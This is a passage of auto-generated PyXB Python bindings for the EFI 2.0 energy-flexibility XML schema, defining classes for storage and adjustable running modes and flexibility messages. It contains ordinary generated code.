    discreteRunningModeElement = property(__discreteRunningModeElement.value, __discreteRunningModeElement.set, None, None)
    # Attribute id inherited from {http://www.flexiblepower.org/efi-2}RunningMode
    # Attribute label inherited from {http://www.flexiblepower.org/efi-2}RunningMode
    # Register the locally declared element with the binding machinery.
    _ElementMap.update({
        __discreteRunningModeElement.name() : __discreteRunningModeElement
    })
    _AttributeMap.update({
    })
# Expose the binding and register it under its XSD name.
_module_typeBindings.StorageDiscreteRunningMode = StorageDiscreteRunningMode
Namespace.addCategoryObject('typeBinding', 'StorageDiscreteRunningMode', StorageDiscreteRunningMode)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_16 (StorageRunningModeElement):
    """Complex type [anonymous] with content type ELEMENT_ONLY.

    PyXB-generated binding for the anonymous complex type declared at
    InflexibleControllerEfi20.xsd line 586.  Extends StorageRunningModeElement
    with filling rate, running cost and per-commodity power/flow elements.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no qualified XSD name of its own.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 586, 6)
    # Copies of the base maps keep the inherited fill-level bound attributes.
    _ElementMap = StorageRunningModeElement._ElementMap.copy()
    _AttributeMap = StorageRunningModeElement._AttributeMap.copy()
    # Base type is StorageRunningModeElement
    # Element {http://www.flexiblepower.org/efi-2}fillingRate uses Python identifier fillingRate
    __fillingRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'fillingRate'), 'fillingRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_16_httpwww_flexiblepower_orgefi_2fillingRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 590, 10), )
    fillingRate = property(__fillingRate.value, __fillingRate.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}runningCost uses Python identifier runningCost
    __runningCost = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), 'runningCost', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_16_httpwww_flexiblepower_orgefi_2runningCost', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 591, 10), )
    runningCost = property(__runningCost.value, __runningCost.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}electricalPower uses Python identifier electricalPower
    __electricalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), 'electricalPower', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_16_httpwww_flexiblepower_orgefi_2electricalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 592, 10), )
    electricalPower = property(__electricalPower.value, __electricalPower.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}gasFlowRate uses Python identifier gasFlowRate
    __gasFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), 'gasFlowRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_16_httpwww_flexiblepower_orgefi_2gasFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 593, 10), )
    gasFlowRate = property(__gasFlowRate.value, __gasFlowRate.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatTemperature uses Python identifier heatTemperature
    __heatTemperature = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), 'heatTemperature', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_16_httpwww_flexiblepower_orgefi_2heatTemperature', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 594, 10), )
    heatTemperature = property(__heatTemperature.value, __heatTemperature.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatFlowRate uses Python identifier heatFlowRate
    __heatFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), 'heatFlowRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_16_httpwww_flexiblepower_orgefi_2heatFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 595, 10), )
    heatFlowRate = property(__heatFlowRate.value, __heatFlowRate.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatThermalPower uses Python identifier heatThermalPower
    __heatThermalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), 'heatThermalPower', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_16_httpwww_flexiblepower_orgefi_2heatThermalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 596, 10), )
    heatThermalPower = property(__heatThermalPower.value, __heatThermalPower.set, None, None)
    # Attribute fillLevelLowerBound inherited from {http://www.flexiblepower.org/efi-2}StorageRunningModeElement
    # Attribute fillLevelUpperBound inherited from {http://www.flexiblepower.org/efi-2}StorageRunningModeElement
    # Register the locally declared elements with the binding machinery.
    _ElementMap.update({
        __fillingRate.name() : __fillingRate,
        __runningCost.name() : __runningCost,
        __electricalPower.name() : __electricalPower,
        __gasFlowRate.name() : __gasFlowRate,
        __heatTemperature.name() : __heatTemperature,
        __heatFlowRate.name() : __heatFlowRate,
        __heatThermalPower.name() : __heatThermalPower
    })
    _AttributeMap.update({
    })
# Expose the binding on the module's type-binding registry.
_module_typeBindings.CTD_ANON_16 = CTD_ANON_16
# Complex type {http://www.flexiblepower.org/efi-2}StorageContinuousRunningMode with content type ELEMENT_ONLY
class StorageContinuousRunningMode (RunningMode):
    """Complex type {http://www.flexiblepower.org/efi-2}StorageContinuousRunningMode with content type ELEMENT_ONLY.

    PyXB-generated binding: extends RunningMode with a repeatable
    ``continuousRunningModeElement`` element.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageContinuousRunningMode')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 617, 1)
    # Copies of the base maps keep the inherited id/label attributes.
    _ElementMap = RunningMode._ElementMap.copy()
    _AttributeMap = RunningMode._AttributeMap.copy()
    # Base type is RunningMode
    # Element {http://www.flexiblepower.org/efi-2}continuousRunningModeElement uses Python identifier continuousRunningModeElement
    # Fifth positional argument True marks this element as plural (may occur multiple times).
    __continuousRunningModeElement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningModeElement'), 'continuousRunningModeElement', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningMode_httpwww_flexiblepower_orgefi_2continuousRunningModeElement', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 621, 5), )
    continuousRunningModeElement = property(__continuousRunningModeElement.value, __continuousRunningModeElement.set, None, None)
    # Attribute id inherited from {http://www.flexiblepower.org/efi-2}RunningMode
    # Attribute label inherited from {http://www.flexiblepower.org/efi-2}RunningMode
    # Register the locally declared element with the binding machinery.
    _ElementMap.update({
        __continuousRunningModeElement.name() : __continuousRunningModeElement
    })
    _AttributeMap.update({
    })
# Expose the binding and register it under its XSD name.
_module_typeBindings.StorageContinuousRunningMode = StorageContinuousRunningMode
Namespace.addCategoryObject('typeBinding', 'StorageContinuousRunningMode', StorageContinuousRunningMode)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_17 (StorageRunningModeElement):
    """Complex type [anonymous] with content type ELEMENT_ONLY.

    PyXB-generated binding for the anonymous complex type declared at
    InflexibleControllerEfi20.xsd line 622.  Extends StorageRunningModeElement
    with ``lowerBound`` and ``upperBound`` elements.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no qualified XSD name of its own.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 622, 6)
    # Copies of the base maps keep the inherited fill-level bound attributes.
    _ElementMap = StorageRunningModeElement._ElementMap.copy()
    _AttributeMap = StorageRunningModeElement._AttributeMap.copy()
    # Base type is StorageRunningModeElement
    # Element {http://www.flexiblepower.org/efi-2}lowerBound uses Python identifier lowerBound
    __lowerBound = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'lowerBound'), 'lowerBound', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_17_httpwww_flexiblepower_orgefi_2lowerBound', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 626, 10), )
    lowerBound = property(__lowerBound.value, __lowerBound.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}upperBound uses Python identifier upperBound
    __upperBound = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'upperBound'), 'upperBound', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_17_httpwww_flexiblepower_orgefi_2upperBound', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 633, 10), )
    upperBound = property(__upperBound.value, __upperBound.set, None, None)
    # Attribute fillLevelLowerBound inherited from {http://www.flexiblepower.org/efi-2}StorageRunningModeElement
    # Attribute fillLevelUpperBound inherited from {http://www.flexiblepower.org/efi-2}StorageRunningModeElement
    # Register the locally declared elements with the binding machinery.
    _ElementMap.update({
        __lowerBound.name() : __lowerBound,
        __upperBound.name() : __upperBound
    })
    _AttributeMap.update({
    })
# Expose the binding on the module's type-binding registry.
_module_typeBindings.CTD_ANON_17 = CTD_ANON_17
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_18 (StorageContinuousRunningModeData):
    """Complex type [anonymous] with content type ELEMENT_ONLY.

    PyXB-generated binding for the anonymous complex type declared at
    InflexibleControllerEfi20.xsd line 627.  Adds nothing locally; all
    content is inherited from StorageContinuousRunningModeData.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no qualified XSD name of its own.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 627, 11)
    # Copies of the base maps keep all inherited element declarations.
    _ElementMap = StorageContinuousRunningModeData._ElementMap.copy()
    _AttributeMap = StorageContinuousRunningModeData._AttributeMap.copy()
    # Base type is StorageContinuousRunningModeData
    # Element fillingRate ({http://www.flexiblepower.org/efi-2}fillingRate) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
    # Element runningCost ({http://www.flexiblepower.org/efi-2}runningCost) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
    # Element electricalPower ({http://www.flexiblepower.org/efi-2}electricalPower) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
    # Element gasFlowRate ({http://www.flexiblepower.org/efi-2}gasFlowRate) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
    # Element heatTemperature ({http://www.flexiblepower.org/efi-2}heatTemperature) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
    # Element heatFlowRate ({http://www.flexiblepower.org/efi-2}heatFlowRate) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
    # Element heatThermalPower ({http://www.flexiblepower.org/efi-2}heatThermalPower) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
# Expose the binding on the module's type-binding registry.
_module_typeBindings.CTD_ANON_18 = CTD_ANON_18
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_19 (StorageContinuousRunningModeData):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    PyXB binding for an anonymous complex type declared at line 634 of
    InflexibleControllerEfi20.xsd.  Extends
    StorageContinuousRunningModeData without adding any local elements or
    attributes (both map updates below are empty).
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no namespace-qualified expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 634, 11)
    # Copy the base maps so local updates cannot mutate the base type.
    _ElementMap = StorageContinuousRunningModeData._ElementMap.copy()
    _AttributeMap = StorageContinuousRunningModeData._AttributeMap.copy()
    # Base type is StorageContinuousRunningModeData
    # Element fillingRate ({http://www.flexiblepower.org/efi-2}fillingRate) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
    # Element runningCost ({http://www.flexiblepower.org/efi-2}runningCost) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
    # Element electricalPower ({http://www.flexiblepower.org/efi-2}electricalPower) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
    # Element gasFlowRate ({http://www.flexiblepower.org/efi-2}gasFlowRate) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
    # Element heatTemperature ({http://www.flexiblepower.org/efi-2}heatTemperature) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
    # Element heatFlowRate ({http://www.flexiblepower.org/efi-2}heatFlowRate) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
    # Element heatThermalPower ({http://www.flexiblepower.org/efi-2}heatThermalPower) inherited from {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData
    # No locally declared elements or attributes.
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
# Register the binding in the module-level type-binding namespace.
_module_typeBindings.CTD_ANON_19 = CTD_ANON_19
# Complex type {http://www.flexiblepower.org/efi-2}AdjustableDiscreteRunningMode with content type ELEMENT_ONLY
class AdjustableDiscreteRunningMode (RunningMode):
    """Complex type {http://www.flexiblepower.org/efi-2}AdjustableDiscreteRunningMode with content type ELEMENT_ONLY

    PyXB binding for the named complex type AdjustableDiscreteRunningMode
    (InflexibleControllerEfi20.xsd line 824), derived from RunningMode.
    Declares six optional-cardinality child elements (runningCost,
    electricalPower, gasFlowRate, heatTemperature, heatFlowRate,
    heatThermalPower), each exposed as a Python property backed by a
    class-private (name-mangled) ElementDeclaration and registered in
    _ElementMap below.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'AdjustableDiscreteRunningMode')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 824, 1)
    # Copy the base maps so local updates cannot mutate RunningMode's maps.
    _ElementMap = RunningMode._ElementMap.copy()
    _AttributeMap = RunningMode._AttributeMap.copy()
    # Base type is RunningMode
    # Element {http://www.flexiblepower.org/efi-2}runningCost uses Python identifier runningCost
    __runningCost = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), 'runningCost', '__httpwww_flexiblepower_orgefi_2_AdjustableDiscreteRunningMode_httpwww_flexiblepower_orgefi_2runningCost', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 828, 5), )
    runningCost = property(__runningCost.value, __runningCost.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}electricalPower uses Python identifier electricalPower
    __electricalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), 'electricalPower', '__httpwww_flexiblepower_orgefi_2_AdjustableDiscreteRunningMode_httpwww_flexiblepower_orgefi_2electricalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 829, 5), )
    electricalPower = property(__electricalPower.value, __electricalPower.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}gasFlowRate uses Python identifier gasFlowRate
    __gasFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), 'gasFlowRate', '__httpwww_flexiblepower_orgefi_2_AdjustableDiscreteRunningMode_httpwww_flexiblepower_orgefi_2gasFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 830, 5), )
    gasFlowRate = property(__gasFlowRate.value, __gasFlowRate.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatTemperature uses Python identifier heatTemperature
    __heatTemperature = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), 'heatTemperature', '__httpwww_flexiblepower_orgefi_2_AdjustableDiscreteRunningMode_httpwww_flexiblepower_orgefi_2heatTemperature', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 831, 5), )
    heatTemperature = property(__heatTemperature.value, __heatTemperature.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatFlowRate uses Python identifier heatFlowRate
    __heatFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), 'heatFlowRate', '__httpwww_flexiblepower_orgefi_2_AdjustableDiscreteRunningMode_httpwww_flexiblepower_orgefi_2heatFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 832, 5), )
    heatFlowRate = property(__heatFlowRate.value, __heatFlowRate.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatThermalPower uses Python identifier heatThermalPower
    __heatThermalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), 'heatThermalPower', '__httpwww_flexiblepower_orgefi_2_AdjustableDiscreteRunningMode_httpwww_flexiblepower_orgefi_2heatThermalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 833, 5), )
    heatThermalPower = property(__heatThermalPower.value, __heatThermalPower.set, None, None)
    # Attribute id inherited from {http://www.flexiblepower.org/efi-2}RunningMode
    # Attribute label inherited from {http://www.flexiblepower.org/efi-2}RunningMode
    # Register the locally declared elements; attribute map gains nothing.
    _ElementMap.update({
        __runningCost.name() : __runningCost,
        __electricalPower.name() : __electricalPower,
        __gasFlowRate.name() : __gasFlowRate,
        __heatTemperature.name() : __heatTemperature,
        __heatFlowRate.name() : __heatFlowRate,
        __heatThermalPower.name() : __heatThermalPower
    })
    _AttributeMap.update({
    })
# Register the binding both in the module and under its namespace-qualified name.
_module_typeBindings.AdjustableDiscreteRunningMode = AdjustableDiscreteRunningMode
Namespace.addCategoryObject('typeBinding', 'AdjustableDiscreteRunningMode', AdjustableDiscreteRunningMode)
# Complex type {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningMode with content type ELEMENT_ONLY
class AdjustableContinuousRunningMode (RunningMode):
    """Complex type {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningMode with content type ELEMENT_ONLY

    PyXB binding for the named complex type AdjustableContinuousRunningMode
    (InflexibleControllerEfi20.xsd line 848), derived from RunningMode.
    Declares two child elements, lowerBound and upperBound, each exposed as
    a Python property backed by a class-private ElementDeclaration and
    registered in _ElementMap below.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'AdjustableContinuousRunningMode')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 848, 1)
    # Copy the base maps so local updates cannot mutate RunningMode's maps.
    _ElementMap = RunningMode._ElementMap.copy()
    _AttributeMap = RunningMode._AttributeMap.copy()
    # Base type is RunningMode
    # Element {http://www.flexiblepower.org/efi-2}lowerBound uses Python identifier lowerBound
    __lowerBound = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'lowerBound'), 'lowerBound', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningMode_httpwww_flexiblepower_orgefi_2lowerBound', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 852, 5), )
    lowerBound = property(__lowerBound.value, __lowerBound.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}upperBound uses Python identifier upperBound
    __upperBound = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'upperBound'), 'upperBound', '__httpwww_flexiblepower_orgefi_2_AdjustableContinuousRunningMode_httpwww_flexiblepower_orgefi_2upperBound', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 859, 5), )
    upperBound = property(__upperBound.value, __upperBound.set, None, None)
    # Attribute id inherited from {http://www.flexiblepower.org/efi-2}RunningMode
    # Attribute label inherited from {http://www.flexiblepower.org/efi-2}RunningMode
    # Register the locally declared elements; no new attributes.
    _ElementMap.update({
        __lowerBound.name() : __lowerBound,
        __upperBound.name() : __upperBound
    })
    _AttributeMap.update({
    })
# Register the binding both in the module and under its namespace-qualified name.
_module_typeBindings.AdjustableContinuousRunningMode = AdjustableContinuousRunningMode
Namespace.addCategoryObject('typeBinding', 'AdjustableContinuousRunningMode', AdjustableContinuousRunningMode)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_20 (AdjustableContinuousRunningModeData):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    PyXB binding for an anonymous complex type declared at line 853 of
    InflexibleControllerEfi20.xsd.  Extends
    AdjustableContinuousRunningModeData without adding any local elements
    or attributes (both map updates below are empty).
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no namespace-qualified expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 853, 6)
    # Copy the base maps so local updates cannot mutate the base type.
    _ElementMap = AdjustableContinuousRunningModeData._ElementMap.copy()
    _AttributeMap = AdjustableContinuousRunningModeData._AttributeMap.copy()
    # Base type is AdjustableContinuousRunningModeData
    # Element runningCost ({http://www.flexiblepower.org/efi-2}runningCost) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
    # Element electricalPower ({http://www.flexiblepower.org/efi-2}electricalPower) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
    # Element gasFlowRate ({http://www.flexiblepower.org/efi-2}gasFlowRate) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
    # Element heatTemperature ({http://www.flexiblepower.org/efi-2}heatTemperature) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
    # Element heatFlowRate ({http://www.flexiblepower.org/efi-2}heatFlowRate) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
    # Element heatThermalPower ({http://www.flexiblepower.org/efi-2}heatThermalPower) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
    # No locally declared elements or attributes.
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
# Register the binding in the module-level type-binding namespace.
_module_typeBindings.CTD_ANON_20 = CTD_ANON_20
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_21 (AdjustableContinuousRunningModeData):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    PyXB binding for an anonymous complex type declared at line 860 of
    InflexibleControllerEfi20.xsd.  Extends
    AdjustableContinuousRunningModeData without adding any local elements
    or attributes (both map updates below are empty).
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no namespace-qualified expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 860, 6)
    # Copy the base maps so local updates cannot mutate the base type.
    _ElementMap = AdjustableContinuousRunningModeData._ElementMap.copy()
    _AttributeMap = AdjustableContinuousRunningModeData._AttributeMap.copy()
    # Base type is AdjustableContinuousRunningModeData
    # Element runningCost ({http://www.flexiblepower.org/efi-2}runningCost) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
    # Element electricalPower ({http://www.flexiblepower.org/efi-2}electricalPower) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
    # Element gasFlowRate ({http://www.flexiblepower.org/efi-2}gasFlowRate) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
    # Element heatTemperature ({http://www.flexiblepower.org/efi-2}heatTemperature) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
    # Element heatFlowRate ({http://www.flexiblepower.org/efi-2}heatFlowRate) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
    # Element heatThermalPower ({http://www.flexiblepower.org/efi-2}heatThermalPower) inherited from {http://www.flexiblepower.org/efi-2}AdjustableContinuousRunningModeData
    # No locally declared elements or attributes.
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
# Register the binding in the module-level type-binding namespace.
_module_typeBindings.CTD_ANON_21 = CTD_ANON_21
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_22 (FlexibilityRegistration):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    PyXB binding for an anonymous complex type declared at line 216 of
    InflexibleControllerEfi20.xsd.  Extends FlexibilityRegistration with a
    single locally declared element, supportedCommodities, exposed as a
    Python property and registered in _ElementMap below.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    # Anonymous type: no namespace-qualified expanded name.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 216, 2)
    # Copy the base maps so local updates cannot mutate the base type.
    _ElementMap = FlexibilityRegistration._ElementMap.copy()
    _AttributeMap = FlexibilityRegistration._AttributeMap.copy()
    # Base type is FlexibilityRegistration
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element instructionProcessingDelay ({http://www.flexiblepower.org/efi-2}instructionProcessingDelay) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
    # Element deviceDescription ({http://www.flexiblepower.org/efi-2}deviceDescription) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
    # Element currency ({http://www.flexiblepower.org/efi-2}currency) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityRegistration
    # Element {http://www.flexiblepower.org/efi-2}supportedCommodities uses Python identifier supportedCommodities
    __supportedCommodities = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodities'), 'supportedCommodities', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_22_httpwww_flexiblepower_orgefi_2supportedCommodities', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 220, 6), )
    supportedCommodities = property(__supportedCommodities.value, __supportedCommodities.set, None, None)
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Register the locally declared element; no new attributes.
    _ElementMap.update({
        __supportedCommodities.name() : __supportedCommodities
    })
    _AttributeMap.update({
    })
# Register the binding in the module-level type-binding namespace.
_module_typeBindings.CTD_ANON_22 = CTD_ANON_22
# Complex type {http://www.flexiblepower.org/efi-2}InflexibleUpdate with content type ELEMENT_ONLY
class InflexibleUpdate (FlexibilityUpdate):
    """Complex type {http://www.flexiblepower.org/efi-2}InflexibleUpdate with content type ELEMENT_ONLY

    PyXB binding for the named complex type InflexibleUpdate
    (InflexibleControllerEfi20.xsd line 247), derived from
    FlexibilityUpdate.  Declares no elements or attributes of its own;
    both map updates below are empty.
    """
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'InflexibleUpdate')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 247, 1)
    # Copy the base maps so local updates cannot mutate the base type.
    _ElementMap = FlexibilityUpdate._ElementMap.copy()
    _AttributeMap = FlexibilityUpdate._AttributeMap.copy()
    # Base type is FlexibilityUpdate
    # Element header ({http://www.flexiblepower.org/efi-2}header) inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # Element flexibilityUpdateId ({http://www.flexiblepower.org/efi-2}flexibilityUpdateId) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Element validFrom ({http://www.flexiblepower.org/efi-2}validFrom) inherited from {http://www.flexiblepower.org/efi-2}FlexibilityUpdate
    # Attribute efiVersion inherited from {http://www.flexiblepower.org/efi-2}EfiMessage
    # No locally declared elements or attributes.
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
# Register the binding both in the module and under its namespace-qualified name.
_module_typeBindings.InflexibleUpdate = InflexibleUpdate
